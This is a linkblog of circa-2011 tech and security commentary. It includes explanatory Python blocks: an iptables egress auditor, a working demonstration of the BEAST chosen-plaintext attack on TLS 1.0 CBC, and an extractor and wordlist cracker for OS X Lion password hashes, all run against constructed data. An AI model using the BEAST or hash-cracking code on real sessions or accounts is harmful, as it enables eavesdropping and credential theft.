For those who do not know, 747s are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 en route. If issues are noted, they can re-tune the engine in air.

The issue here is that all that separated the engine control systems and the open network was NAT-based filters. There were (and as far as I know this is true today) no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in pen testing and know what a shoveled shell is… I need not say more.

FACT CHECK: SCADA Systems Are Online Now by Craig S Wright for INFOSEC Island.

Who knew Boeing 747s were huge UNIX zombies-in-waiting? Convenience, and the fear that a properly locked-down firewall will break some “mission critical” functionality, are all too common. It is for these reasons that there are so many half-assed security implementations in the wild.

Unfortunately, our leaders rarely see the benefit of security. In fact, security merely sucks resources - money and people - without providing any immediate return on investment. Security ROI is a subjective, political art many are unable to master.

Our leaders are all too willing to take huge risks, falsely believing their systems and networks will not be targeted or that their half-assed security posture is enough to withstand an attack. Can you imagine what might happen if malicious attackers were able to gain control of a 747’s engine management system?

I cannot fathom why, other than pure laziness, these systems are not properly secured. Default-deny egress filtering alone would stop the shoveled shell Wright describes, and a layered defense with both ingress and egress firewalls and filters is well-understood territory; securing these systems would be fairly easy. This is utterly flabbergasting.
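One check a practitioner would run against a filter like the one Wright describes, as an added example (not from this post or the linked article): parse an iptables-save dump and report whether outbound traffic is default-deny. Both rulesets below are constructed for illustration, one ingress-only with NAT and one with egress filtering; the interface names and addresses are placeholders.

```python
"""Audit an iptables ruleset for missing egress controls.

Added example, not from the original post or the linked article. It parses
iptables-save(8) text and reports whether outbound traffic is default-deny,
which is the control the post says was absent. Rulesets are constructed.
"""
import re

# Constructed: an "ingress-only" filter like the one described. Inbound is
# filtered and NATed, but OUTPUT's policy is ACCEPT with no rules, so any
# process can open an outbound connection (a reverse/"shoveled" shell).
INGRESS_ONLY = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth1 -p tcp --dport 23 -j ACCEPT
COMMIT
"""

# Constructed: the same host with egress filtering. OUTPUT is default-deny and
# only the flows the engineers need (DNS, syslog) are allowed explicitly.
WITH_EGRESS = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT DROP [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth1 -p tcp --dport 23 -j ACCEPT
-A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -o eth1 -p udp -d 10.0.0.53 --dport 53 -j ACCEPT
-A OUTPUT -o eth1 -p tcp -d 10.0.0.10 --dport 514 -j ACCEPT
-A OUTPUT -j LOG --log-prefix "egress-drop: "
COMMIT
"""

POLICY_RE = re.compile(r"^:(\w+)\s+(ACCEPT|DROP|REJECT)\b")
RULE_RE = re.compile(r"^-A\s+(\w+)\s+(.*)$")


def parse_filter_table(text):
    """Return (chain policies, [(chain, rule)]) for the *filter table only."""
    policies, rules, table = {}, [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
            continue
        if table != "filter":
            continue
        m = POLICY_RE.match(line)
        if m:
            policies[m.group(1)] = m.group(2)
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group(1), m.group(2)))
    return policies, rules


def egress_findings(text):
    """List problems with outbound filtering; empty means default-deny egress."""
    policies, rules = parse_filter_table(text)
    findings = []
    output_rules = [r for chain, r in rules if chain == "OUTPUT"]
    # iptables chains default to ACCEPT when no policy line is present.
    if policies.get("OUTPUT", "ACCEPT") == "ACCEPT":
        findings.append("OUTPUT policy is ACCEPT: any process can reach any host")
    for r in output_rules:
        # A bare "-j ACCEPT" on OUTPUT makes a DROP policy meaningless.
        if r.strip() == "-j ACCEPT":
            findings.append("OUTPUT has an unconditional ACCEPT rule")
        # Every new outbound flow should be pinned to a destination and port.
        elif "-j ACCEPT" in r and "ESTABLISHED" not in r:
            if "-d " not in r or "--dport" not in r:
                findings.append("outbound allow without host+port pin: " + r)
    return findings


def allowed_egress(text):
    """Return the explicit (proto, dst, port) tuples the ruleset lets out."""
    _, rules = parse_filter_table(text)
    out = []
    for chain, r in rules:
        if chain != "OUTPUT" or "-j ACCEPT" not in r or "ESTABLISHED" in r:
            continue
        proto = re.search(r"-p\s+(\w+)", r)
        dst = re.search(r"-d\s+(\S+)", r)
        port = re.search(r"--dport\s+(\d+)", r)
        out.append((proto.group(1) if proto else "any",
                    dst.group(1) if dst else "any",
                    int(port.group(1)) if port else 0))
    return out


if __name__ == "__main__":
    for name, rs in (("ingress-only", INGRESS_ONLY), ("with-egress", WITH_EGRESS)):
        print(name, egress_findings(rs) or "OK", allowed_egress(rs))
```

Run as a script it prints the findings for both rulesets; in practice feed it the output of iptables-save from the host. A clean result means nothing leaves without an explicit rule, not that the allowed destinations are the right ones; that part still needs a human.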

But specs do not sell tablets. Most consumers are looking for a different experience than what they can get on their desktop or notebook. Without knowing it, they’re looking for lasting novelty. Sure, some consumers want multitasking, some want a tweakable interface, perhaps some out there even want a tablet with seven homescreens and an app drawer. That’s where Android tablets come in. The iPad, however, captures consumers with a slightly new paradigm in portable computing and does so with style and class.

If A Motorola Android Tab Leaks And It’s Just Like The Rest, Does It Really Matter? by Matt Burns from TechCrunch.

Simply put: Android tablets are missing the simplicity and elegance of the iPad.

Therein lies the current problem with Android tablets. Vendors are too busy pimping out specs, playing the same game with tablets that they played with desktops and laptops. Customers flocked to the iPad because of its simplicity, not just in the use of the device but also in being able to determine which model to buy. Have the vendors learned nothing from Apple over the course of the past ten years?

Simplicity is key. One of the reasons Apple’s iPad has been so successful is that it transcends these games. The only real questions a potential iPad buyer must ask themselves are: 1) Do I need 3G access in addition to wifi? and 2) How much onboard storage space do I need? With the impending release of iCloud - and other services like Spotify and Dropbox - the second question is becoming increasingly irrelevant.

The new era of mobile computing will not be defined by chip speeds, RAM and storage space. Instead, it will be defined by other more consumer-oriented features such as screen size, mobile carrier access, and immediate availability of applications.

The latter area - tablet specific applications - is where Android currently lags way behind Apple. Until this changes, Android is going to have a tough time gaining any significant traction in the tablet market.

Amazon has begun sending out invites for an upcoming September 28 press conference, most likely to announce its fabled tablet. Rather than being held in their global headquarters in Seattle, the press conference is taking place smack dab in the middle of the publishing industry: New York City. The implication is Amazon will be positioning the device not necessarily as an iPad competitor, but a higher-grade version of their Kindle, designed for consuming content purchased from the Amazon ecosystem.

Regardless of how Amazon is positioning the device, I am very excited to see what they have designed and built. I am not sure what is more exciting: the hardware or what Amazon has done with their forked version of Android. Either way, the Christmas buying season is going to be interesting, with a lot of Kindle $TABLET vs. iPad 2 discussion taking place. (via TiPb)

The Cyberwar Arms Race. I’m not worried about cyberwar, but I am worried about the proliferation of cyber weapons. Arms races are fundamentally destabilizing, especially when their development can be so easily hidden. I worry about cyberweapons being triggered by accident, cyberweapons getting into the wrong hands and being triggered on purpose, and the inability to reliably trace a cyberweapon leading to increased distrust. Plus, arms races are expensive.

Three Emerging Cyber Threats by Bruce Schneier.

It’s hard to argue with Schneier, as he is one of the most insightful security commentators around. He has always taken a much more pragmatic view of the world rather than predicting doom and gloom like so many pundits and news organizations.

BuddyPress 1.5 Released

Coinciding with the recent bbPress upgrade, BuddyPress 1.5 has been released:

Version 1.5 is a major BuddyPress feature release. Code-named “Lombardi” after the first pizzeria in the United States (with a wink and a nod toward the Wisconsin roots of several members of the BP dev team), BuddyPress 1.5 introduces many dozens of new features and enhancements, on top of hundreds of bugfixes.

As with any new software release, there are a host of new features, bug fixes and more. The more notable changes in BuddyPress 1.5 are an improved interface for managing profiles, a refreshed default theme offering header customization, an optional one-column page template, sexier content design and much better integration with bbPress.

This is one of the more kick-ass updates to BuddyPress. If you have ever considered running your own specialized social network then BuddyPress may be just what the doctor ordered. While an out-of-the-box combination of BuddyPress, bbPress and WordPress does make for a spiffy site, definitely take some time to customize it a bit - BP makes it about as easy as possible.

Normally, both your asses would be dead as fucking fried chicken, but you happen to pull this shit while I’m in a transitional period so I don’t wanna kill you, I wanna help you. But I can’t give you this case, it don’t belong to me. Besides, I’ve already been through too much shit this morning over this case to hand it over to your dumb ass.

The Samuel L. Ipsum generator has got to be the best of its breed. Use it to create some charismatic motherfucking placeholder text.

You gotta admit, reading Samuel L. Jackson quotes is a whole lot more exciting than the boring Latin text we are used to seeing these days. (via Kottke)

Nikkei Business scooped the news on Thursday, September 22 that AU by KDDI, a Japanese mobile phone carrier, will carry the new iPhone 5 in November 2011.

AU by KDDI to carry iPhone 5 in Japan.

If true, this is outstanding news, especially with recent concerns that Softbank is considering getting rid of their unlimited data plan.

Serious TLS Vulnerability Discovered

Dan Goodin for The Register:

The vulnerability resides in versions 1.0 and earlier of TLS, or transport layer security, the successor to the secure sockets layer technology that serves as the internet’s foundation of trust. Although versions 1.1 and 1.2 of TLS aren’t susceptible, they remain almost entirely unsupported in browsers and websites alike, making encrypted transactions on PayPal, GMail, and just about every other website vulnerable to eavesdropping by hackers who are able to control the connection between the end user and the website he’s visiting.

TLS is what protects millions of popular web sites, not only PayPal and Gmail as mentioned but most e-commerce and online banking sessions as well. That a session can be decrypted by an attacker sitting between you and the site should give you pause.

“BEAST is different than most published attacks against HTTPS,” Duong wrote in an email. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”

Things are only going to get worse before they get better. Until now browser security has been of peripheral interest to most vendors. Now that attacks like these are increasing in both frequency and sophistication, maybe the browser vendors will start to take safeguarding transport and data more seriously. Worth keeping in mind: BEAST needs both a vantage point on the path between the browser and the site and a way to make that browser send attacker-chosen plaintext over the same connection, and the fixes are on the browser and server side (moving off TLS 1.0’s CBC cipher suites, or splitting records so the IV is no longer predictable), not anything an end user can flip.
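The weakness Duong is describing, as an added example rather than code from the article or from the BEAST authors: in TLS 1.0, CBC mode reuses the last ciphertext block of one record as the IV of the next, so an attacker who can read the ciphertext and inject chosen plaintext on the same connection can test a guess for an earlier plaintext block with a single probe. The block cipher below is a toy Feistel construction over HMAC-SHA256, an assumption made so the file runs with only the standard library; the chaining and the attack logic follow TLS 1.0. The HTTP request and cookie value are constructed.

```python
"""BEAST's core primitive against TLS 1.0 CBC, as an added example.

Not code from the article or the BEAST authors. The cipher is a toy; the
predictable-IV chaining and the chosen-plaintext probe are the real thing.
"""
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Toy 16-byte block cipher (4-round Feistel, HMAC-SHA256 round function).

    Stands in for AES so nothing outside the standard library is needed; the
    attack does not depend on the cipher, only on CBC with a predictable IV.
    """
    left, right = block[:8], block[8:]
    for i in range(4):
        f = hmac.new(key, bytes([i]) + right, hashlib.sha256).digest()[:8]
        left, right = right, _xor(left, f)
    return left + right


class Tls10Sender:
    """CBC-encrypts records and, like TLS 1.0, uses the last ciphertext block
    of one record as the IV of the next. MAC and padding are omitted."""

    def __init__(self, key):
        self.key = key
        self.last_block = os.urandom(BLOCK)  # first IV comes from the key block

    def send(self, plaintext):
        assert len(plaintext) % BLOCK == 0, "demo records are whole blocks"
        out, prev = b"", self.last_block
        for i in range(0, len(plaintext), BLOCK):
            prev = block_encrypt(self.key, _xor(plaintext[i:i + BLOCK], prev))
            out += prev
        self.last_block = prev  # on the wire, so the next IV is known
        return out


def guess_block(sender, c_prev, c_target, guess):
    """One BEAST probe: is `guess` the plaintext block that produced c_target?

    c_target = E(P xor c_prev). The attacker knows the next IV, so injecting
    guess xor c_prev xor next_iv makes the cipher input guess xor c_prev; the
    probe's first block equals c_target exactly when guess == P.
    """
    probe = sender.send(_xor(_xor(guess, c_prev), sender.last_block))
    return probe[:BLOCK] == c_target


def recover_block(sender, c_prev, c_target, candidates):
    """Try each candidate block; one injected record is spent per guess."""
    for cand in candidates:
        if guess_block(sender, c_prev, c_target, cand):
            return cand
    return None


def recover_last_byte(sender, c_prev, c_target, known_prefix):
    """The byte-at-a-time trick: if the attacker has aligned the request so
    that 15 bytes of the target block are under their control, the one
    secret byte needs at most 256 probes instead of 2**128."""
    assert len(known_prefix) == BLOCK - 1
    for b in range(256):
        if guess_block(sender, c_prev, c_target, known_prefix + bytes([b])):
            return b
    return None


if __name__ == "__main__":
    victim = Tls10Sender(os.urandom(16))
    victim.send(b"GET / HTTP/1.1\r\n")          # constructed request, 16 bytes
    c_prev = victim.last_block                   # observed on the wire
    ct = victim.send(b"Cookie: sid=7f3a")        # constructed secret block
    print(recover_block(victim, c_prev, ct[:BLOCK],
                        [b"Cookie: sid=0000", b"Cookie: sid=7f3a"]))
```

The script confirms the cookie block with two probes. Against a real browser the hard parts are getting those probes sent (BEAST used a same-origin bypass to do it) and aligning the record boundary so that only one unknown byte lands in each block, which `recover_last_byte` shows in miniature.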

What most people are probably concerned with is whether or not they should stop buying things online or conducting online banking. I would submit that you are more than likely still safe; the chances of being targeted are fairly slim. However, you do need to remain vigilant and be very cautious when handling any form of online monetary transaction. Constantly monitor your credit cards and bank accounts for fraudulent activity and immediately report anything out of the ordinary.

Be careful out there. It’s a brave new world.

bbPress 2.0 Unleashed

From the bbPress blog release announcement:

Simply by activating bbPress 2.0, any standard WordPress theme is suddenly capable of having support forums, user profiles, topic tags, and custom topic views. Your users are able to mark topics as favorites to read them later, and can subscribe to be notified via email to topic replies, so they never miss out on the conversation.

One of the cooler features of bbPress 2.0 is that it has built-in support for BuddyPress, significantly simplifying integration with the “social network in a box” WordPress plug-in. This alone should make bbPress attractive, not to mention the countless other new features, bug fixes and minor changes.

It appears in the redesign of OS X Lion’s authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

Cracking OS X Lion Passwords.

This is a must-read if you are at all interested in security. There are no fixes currently available. Presumably, Apple will patch this vulnerability in a forthcoming security update. In the meantime, the practical exposure is that any local user can pull every other user’s hash and crack it offline, so on a shared Lion box treat the passwords as only as strong as they are against a wordlist.
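What an attacker does with the data once they have it, as an added example (not code from the linked article): Lion stores each user’s hash in the ShadowHashData attribute as a 4-byte salt followed by SHA-512(salt || password), the format password crackers call “xsha512”. The plist layout with a SALTED-SHA512 entry is my understanding of Lion’s format and is labelled as an assumption in the code; the sample blob is constructed from a known password so the example runs offline, standing in for the directory data the article says Lion hands to non-root users.

```python
"""Verify and crack Lion-style SALTED-SHA512 hashes. Added example, not from
the linked article. Assumed layout: ShadowHashData is a binary plist whose
SALTED-SHA512 entry is a 4-byte salt followed by SHA-512(salt || password).
"""
import hashlib
import hmac
import plistlib

SALT_LEN = 4      # 4-byte salt
DIGEST_LEN = 64   # SHA-512 output


def salted_sha512(salt, password):
    """Produce the 68-byte SALTED-SHA512 value for a salt and password."""
    assert len(salt) == SALT_LEN
    return salt + hashlib.sha512(salt + password.encode()).digest()


def make_shadow_hash_data(salt, password):
    """Constructed stand-in for a user's ShadowHashData attribute (assumed
    layout: binary plist with a SALTED-SHA512 data entry)."""
    return plistlib.dumps({"SALTED-SHA512": salted_sha512(salt, password)},
                          fmt=plistlib.FMT_BINARY)


def extract_xsha512(shadow_hash_data):
    """Pull salt+digest out of ShadowHashData and return it as hex, which is
    the 'xsha512' form cracking tools accept."""
    entry = plistlib.loads(shadow_hash_data)["SALTED-SHA512"]
    if len(entry) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(entry))
    return entry.hex()


def verify(xsha512_hex, password):
    """Constant-time check of one password against an xsha512 hex string."""
    raw = bytes.fromhex(xsha512_hex)
    salt, digest = raw[:SALT_LEN], raw[SALT_LEN:]
    candidate = hashlib.sha512(salt + password.encode()).digest()
    return hmac.compare_digest(candidate, digest)


def crack(xsha512_hex, wordlist):
    """Offline guess loop. One unstretched SHA-512 per guess is why handing
    these hashes to any local user matters: a wordlist runs in seconds."""
    raw = bytes.fromhex(xsha512_hex)
    salt, digest = raw[:SALT_LEN], raw[SALT_LEN:]
    for word in wordlist:
        if hashlib.sha512(salt + word.encode()).digest() == digest:
            return word
    return None


# Constructed sample: salt deadbeef, password "letmein".
SAMPLE_BLOB = make_shadow_hash_data(bytes.fromhex("deadbeef"), "letmein")
SAMPLE_HASH = extract_xsha512(SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print(crack(SAMPLE_HASH, ["password", "123456", "letmein"]))
```

The salt defeats precomputed tables but does nothing about guessing speed, since there is no iteration count; that is the difference between this scheme and a PBKDF2- or bcrypt-style hash, and it is why read access for unprivileged users is the whole vulnerability.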

At least eight different kinds of computer virus including Trojan horse, which steals key information from infected computer hardware, were found at Mitsubishi Heavy’s main office or production sites, the Yomiuri said. It is the country’s biggest defense contractor, winning 215 deals worth 260 billion yen ($3.4 billion) from Japan’s Ministry of Defense in the year to last March, or nearly a quarter of the ministry’s spending that year.

Japan’s defence industry hit by its first cyber attack from Reuters.

I find the “first cyber attack” claim to be pretty dubious, especially considering it is 2011. These so-called “cyber attacks” happen every day. That Mitsubishi is finally capable of detecting and confirming an intrusion is terrifying. Hopefully the other defense contractors have a much better grasp on information technology and information assurance practices.

This situation is only going to get worse.

Lastly, I wish the article did not refer to what they found as a virus. It is better described as malware. Calling what was found a virus gives the impression that installing some form of anti-virus software would have detected the malicious activity.

Nothing could be further from reality.

Mr. Obama, in a bit of political salesmanship, will call his proposal the “Buffett Rule,” in a reference to Warren E. Buffett, the billionaire investor who has complained repeatedly that the richest Americans generally pay a smaller share of their income in federal taxes than do middle-income workers, because investment gains are taxed at a lower rate than wages.

Obama Tax Plan Would Ask More of Millionaires by Jackie Calmes for the NY Times.

This is merely another Obama proposal for the GOP to refuse to enact regardless of how much it makes sense, simply because Obama is not one of them and they protect their own.

A glimpse of North Korea from Boston.com.

All of the imagery is absolutely stunning.

Windows 8 BSOD now includes a sad face :(.

Seriously.

On a serious note, it sure is nice to see Microsoft finally simplify the previously over-complicated BSOD. How many people ever paid attention to all the crazy STOP codes and hex dump and whatnot? This, at least, makes some sense.

An Ohio woman said Tuesday that she endured nearly four hours in police custody that included being forced off an airplane in handcuffs, strip-searched and interrogated at Detroit’s airport on the 10th anniversary of the Sept. 11 attacks — all, she believes, because of her Middle Eastern appearance.

Shoshana Hebshi, 35, told The Associated Press she was one of three people removed from a Denver-to-Detroit Frontier Airlines flight after landing Sunday afternoon. Authorities say fighter jets escorted the plane after its crew reported that two people were spending a long time in a bathroom — the two men sitting next to Hebshi in the 12th row.

NPR